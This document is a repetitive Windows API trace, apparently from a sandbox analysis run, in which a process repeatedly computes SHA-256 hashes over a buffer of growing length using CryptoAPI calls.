	[0208.376] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.376] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.376] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0208.376] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b18d0
	[0208.376] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b18d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b18d0, pdwDataLen=0x129364) returned 1
	[0208.376] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.376] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.376] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.377] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.377] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0208.377] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b18f8
	[0208.377] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b18f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b18f8, pdwDataLen=0x129364) returned 1
	[0208.377] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.377] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.377] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.377] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.377] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0208.377] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1920
	[0208.377] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1920, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1920, pdwDataLen=0x129364) returned 1
	[0208.377] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.377] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.377] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.378] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.378] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0208.378] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1948
	[0208.378] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1948, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1948, pdwDataLen=0x129364) returned 1
	[0208.378] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.378] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.378] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.378] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.378] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0208.378] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1970
	[0208.378] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1970, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1970, pdwDataLen=0x129364) returned 1
	[0208.378] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.378] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.378] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.379] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.379] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0208.379] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1998
	[0208.379] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1998, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1998, pdwDataLen=0x129364) returned 1
	[0208.379] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.379] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.379] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.379] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.379] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0208.379] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b19c0
	[0208.379] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b19c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b19c0, pdwDataLen=0x129364) returned 1
	[0208.379] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.379] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.379] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.380] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.380] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0208.380] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b19e8
	[0208.380] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b19e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b19e8, pdwDataLen=0x129364) returned 1
	[0208.380] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.380] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.380] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.380] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.380] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0208.380] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1a10
	[0208.380] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1a10, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1a10, pdwDataLen=0x129364) returned 1
	[0208.380] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.380] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.380] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.381] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.381] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0208.381] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1a38
	[0208.381] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1a38, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1a38, pdwDataLen=0x129364) returned 1
	[0208.381] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.381] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.381] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.381] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.381] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0208.381] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1a60
	[0208.381] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1a60, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1a60, pdwDataLen=0x129364) returned 1
	[0208.381] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.381] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.381] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.382] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.382] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0208.382] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1a88
	[0208.382] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1a88, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1a88, pdwDataLen=0x129364) returned 1
	[0208.382] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.382] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.382] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.382] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.382] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0208.382] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1ab0
	[0208.382] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1ab0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1ab0, pdwDataLen=0x129364) returned 1
	[0208.382] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.382] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.382] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.383] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.383] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0208.383] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1ad8
	[0208.383] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1ad8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1ad8, pdwDataLen=0x129364) returned 1
	[0208.383] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.383] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.383] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.383] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.383] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0208.383] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1b00
	[0208.383] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1b00, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1b00, pdwDataLen=0x129364) returned 1
	[0208.383] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.383] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.383] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.384] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.384] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0208.384] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.384] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1b28
	[0208.384] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1b28, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1b28, pdwDataLen=0x129364) returned 1
	[0208.384] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.384] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.384] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.384] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.384] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0208.384] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.384] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1b50
	[0208.384] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1b50, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1b50, pdwDataLen=0x129364) returned 1
	[0208.384] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.384] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.384] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.385] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.385] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0208.385] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1b78
	[0208.385] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1b78, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1b78, pdwDataLen=0x129364) returned 1
	[0208.385] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.385] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.385] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.389] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.389] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0208.389] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.390] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1ba0
	[0208.390] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1ba0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1ba0, pdwDataLen=0x129364) returned 1
	[0208.390] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.390] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.390] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.399] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.399] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0208.400] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.615] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc2d8
	[0208.615] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cc2d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc2d8, pdwDataLen=0x129364) returned 1
	[0208.615] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.615] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.615] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.616] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.616] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0208.616] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc300
	[0208.616] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26cc300, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26cc300, pdwDataLen=0x129364) returned 1
	[0208.616] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.616] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.616] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.616] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.616] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0208.616] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1bc8
	[0208.616] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1bc8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1bc8, pdwDataLen=0x129364) returned 1
	[0208.616] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.616] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.616] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.617] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.617] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0208.617] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.617] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1bf0
	[0208.617] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1bf0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1bf0, pdwDataLen=0x129364) returned 1
	[0208.617] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.617] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.617] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.617] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.617] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0208.617] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.617] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1c18
	[0208.617] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26b1c18, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1c18, pdwDataLen=0x129364) returned 1
	[0208.617] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0208.617] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.617] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.618] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.618] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0208.618] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1c40
	[0208.618] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b1c40, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b1c40, pdwDataLen=0x129364) returned 1
	[0208.618] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.618] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0208.618] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2255b0) returned 1
	[0208.618] CryptCreateHash (in: hProv=0x2255b0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.618] CryptHashData (hHash=0x22b6ac0, pbData=0x275fc38, dwDataLen=0x9e0, dwFlags=0x0) returned 1
